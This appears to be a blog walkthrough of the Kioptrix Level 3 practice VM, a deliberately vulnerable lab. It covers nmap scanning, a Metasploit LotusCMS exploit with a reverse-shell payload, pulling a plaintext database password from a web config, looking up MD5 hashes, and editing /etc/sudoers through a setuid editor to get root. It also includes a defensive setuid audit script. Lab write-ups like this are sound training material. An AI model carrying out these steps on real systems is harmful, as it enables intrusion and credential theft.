[Hacking series] – Kioptrix level 3

Written by  on June 8, 2015 

Code name: Kioptrix3

Webpage: http://kioptrix.com/

VM Download: www.kioptrix.com/dlvm/KVM3.rar

Challenge: Get root on the system

First of all, let’s see which ports are open.

# nmap -p- -Pn -A


Port 80 is open, as usual. Let’s browse it.


Ligoat? Hmm, we can dig a little deeper.


Jackpot! So LotusCMS, huh...

We can search for it in exploit databases such as Metasploit or the Exploit Database to see if we can find something useful.

# msfconsole

msf > search lotus


Exploit found? Let’s try this one

msf > set RHOST

msf > set URI /


We can also set the payload and edit its options

msf > set LHOST

msf > set LPORT 8723


And then just run the exploit

msf > exploit


Now we are in, but our shell is not privileged, so we must find a way to escalate our privileges on the system. One way to do that is to look for files with special permission bits, which always run with the privileges of the file's owning user or owning group rather than those of the user who launches them. We can search for files that are always executed as their owning user (setuid) with:

$ find / -perm -u=s -type f 2>/dev/null


And we found an interesting one, /usr/local/bin/ht
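From the defender's side, the same find search becomes a periodic audit. The following is an added example, not part of the original walkthrough: it reports setuid or setgid files that are missing from an allowlist of expected paths. The function names, the allowlist format (one absolute path per line) and the sample tree are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: report setuid/setgid files that are not on an allowlist.

audit_setuid() {
    root=$1        # directory tree to scan
    allowlist=$2   # file with one expected setuid/setgid path per line

    # -perm -4000 matches setuid, -perm -2000 matches setgid; -xdev stays on one filesystem.
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort |
    while IFS= read -r path; do
        # -x whole-line match, -F fixed string: the path must be listed exactly.
        if ! grep -qxF -- "$path" "$allowlist"; then
            # Print mode, numeric owner and path of every unexpected file.
            ls -ln -- "$path" | awk -v p="$path" '{ print $1, "uid=" $3, p }'
        fi
    done
}

# Constructed sample tree: one allowlisted setuid file and one unexpected one.
make_sample_tree() {
    d=$1
    mkdir -p "$d/usr/bin" "$d/usr/local/bin"
    : > "$d/usr/bin/passwd"
    : > "$d/usr/local/bin/ht"
    chmod 4755 "$d/usr/bin/passwd" "$d/usr/local/bin/ht"
    printf '%s\n' "$d/usr/bin/passwd" > "$d/allowlist"
}

tmp=$(mktemp -d)
make_sample_tree "$tmp"
audit_setuid "$tmp" "$tmp/allowlist"   # reports only .../usr/local/bin/ht
rm -rf "$tmp"
```

On a real host the call would be `audit_setuid / /path/to/allowlist`, with the allowlist generated from a known-good install; anything reported under /usr/local or a home directory deserves a close look.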

But if we try to open it from our shell…


Damn, we will need a fully interactive shell for that. SSH will do the job, but we need to find a valid user and its password… we need to dig deeper in the system.


After a quick search, we found what we needed in the web public directory. As the webapp works with php-mysql, we can find the MySQL DB admin password stored in plain text inside the webapp configuration file!


Nice! Now we can try to log in with these credentials. nikto had found a phpMyAdmin installation, so we can log in there.


After looking inside the database’s tables, we found two interesting entries


It looks like the passwords are stored as MD5 hashes. We can look them up in a public MD5 hash database


Password found, now we can log in via SSH


We are in. Now that we have a fully interactive shell, we can go back and execute ht


Let’s see


It looks like a text editor. As we are running it with root privileges, we can try to open or edit some interesting files. Two interesting files are /etc/sudoers and /etc/shadow


After opening the file, we can edit it.


I’ve edited /etc/sudoers and granted all privileges to the user loneferret. Now we can just run

# sudo su

And get root


Game over kioptrix3 P-)
